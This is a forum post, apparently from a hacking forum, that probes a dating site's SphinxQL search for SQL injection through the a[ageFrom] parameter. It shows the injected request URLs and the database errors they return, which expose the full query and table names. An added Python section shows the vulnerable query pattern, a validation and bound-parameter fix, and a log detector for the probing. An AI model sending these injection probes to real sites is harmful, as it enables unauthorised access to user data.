20.09.2016, 18:55   #3
YuNi|[c
Quote:
Originally posted by profexer
Does the unclosed comment cause an error?
With /* it goes through without an error, and with ;%00 too.
But it reacts differently to OR or AND:
Code:
xttp://site.com/search?a[ageFrom]=18 or 1=1/*&a[ageTo]=90&param1=value1.....paramN=value=N
Code:
Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected OR, expecting $end near 'or 1=1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 or 1=1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;
Code:
xttp://site.com/search?a[ageFrom]=18 and 1=1/*&a[ageTo]=90&param1=value1.....paramN=value=N
Code:
Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected CONST_INT, expecting IDENT (or 97 other tokens) near '1=1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 and 1=1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;
Code:
xttp://site.com/search?a[ageFrom]=18' and 456='456;%00&a[ageTo]=90&param1=value1.....paramN=value=N
Code:
Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected QUOTED_STRING, expecting $end near '' and 456='456;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18' and 456='456; AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;
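Added example, not code from the thread or from the site it discusses, and written in Python rather than the application's PHP/PDO stack: it reproduces the query shape visible in the quoted error output (the request value is interpolated straight into the SphinxQL WHERE clause), shows the strict integer validation plus bound parameters that would reject every value in the post, and flags the `sphinxql: syntax error` lines such probing leaves in a server log. Table and column names are the ones the errors show; `QUERY_TEMPLATE`, the function names, the age range and the sample log lines are constructed assumptions.

```python
import re

# Constructed copy of the WHERE clause seen in the post's error output; the
# rest of the application (framework, driver) is assumed, not taken from the page.
QUERY_TEMPLATE = (
    "SELECT `id_user`, is_online FROM profiles_female "
    "WHERE can_receive_gift = 1 AND is_blocked = 0 "
    "AND age >= {age_from} AND age <= {age_to} "
    "ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;"
)


def build_query_unsafe(age_from: str, age_to: str) -> str:
    """The defect the post exposes: a[ageFrom] / a[ageTo] land verbatim in the query."""
    return QUERY_TEMPLATE.format(age_from=age_from, age_to=age_to)


# Whitelist: one to three decimal digits, nothing else (no spaces, quotes, comments, NUL).
AGE_RE = re.compile(r"[0-9]{1,3}")


def parse_age(value, lo: int = 0, hi: int = 150) -> int:
    """Reject anything that is not a plain integer in a sane range (range is assumed)."""
    if not isinstance(value, str) or AGE_RE.fullmatch(value) is None:
        raise ValueError(f"age must be a decimal integer, got {value!r}")
    age = int(value)
    if not lo <= age <= hi:
        raise ValueError(f"age {age} outside {lo}..{hi}")
    return age


def build_query_safe(age_from, age_to):
    """Validate first, then hand the driver placeholders plus typed parameters.

    Returns (sql, params) in the bound-parameter style of PDO / DB-API drivers
    (the concrete driver is assumed); the values never touch the SQL text.
    """
    params = (parse_age(age_from), parse_age(age_to))
    sql = QUERY_TEMPLATE.format(age_from="?", age_to="?")
    return sql, params


# Detection side: SphinxQL reports the first token it could not parse, which is
# exactly what shows up when a numeric parameter is tampered with.
SPHINX_ERR = re.compile(r"sphinxql: syntax error, unexpected (?P<token>\w+)")


def flag_sphinx_syntax_errors(log_lines):
    """Return (line_no, unexpected_token) for every log line carrying a SphinxQL parse error."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        m = SPHINX_ERR.search(line)
        if m:
            hits.append((line_no, m.group("token")))
    return hits


# Constructed sample log: one normal request, then the three errors quoted in the post
# (timestamps and the leading fields are made up).
SAMPLE_LOG = [
    "2016-09-20 18:55:01 search ok a[ageFrom]=18 a[ageTo]=90",
    "2016-09-20 18:55:07 SQLSTATE[42000]: 1064 sphinxql: syntax error, unexpected OR, "
    "expecting $end near 'or 1=1/* AND age <= 90 AND id_partner != 3 ORDER BY rand()'",
    "2016-09-20 18:55:19 SQLSTATE[42000]: 1064 sphinxql: syntax error, unexpected CONST_INT, "
    "expecting IDENT (or 97 other tokens) near '1=1/* AND age <= 90 AND id_partner != 3'",
    "2016-09-20 18:55:31 SQLSTATE[42000]: 1064 sphinxql: syntax error, unexpected QUOTED_STRING, "
    "expecting $end near '' and 456='456;'",
]


if __name__ == "__main__":
    print("unsafe:", build_query_unsafe("18 or 1=1/*", "90"))
    print("safe:  ", build_query_safe("18", "90"))
    for bad in ("18 or 1=1/*", "18 and 1=1/*", "18' and 456='456;\x00"):
        try:
            parse_age(bad)
        except ValueError as exc:
            print("rejected:", exc)
    print("log hits:", flag_sphinx_syntax_errors(SAMPLE_LOG))
```

Because the parameters are integers, a regex whitelist followed by an `int()` cast is the whole fix; binding them as parameters on top of that keeps the query text constant, so a later change of the column to a string type does not quietly reopen the hole. On the monitoring side, a burst of `unexpected OR` / `unexpected CONST_INT` / `unexpected QUOTED_STRING` errors from one client on a single endpoint is the server-side footprint of exactly the probing quoted above.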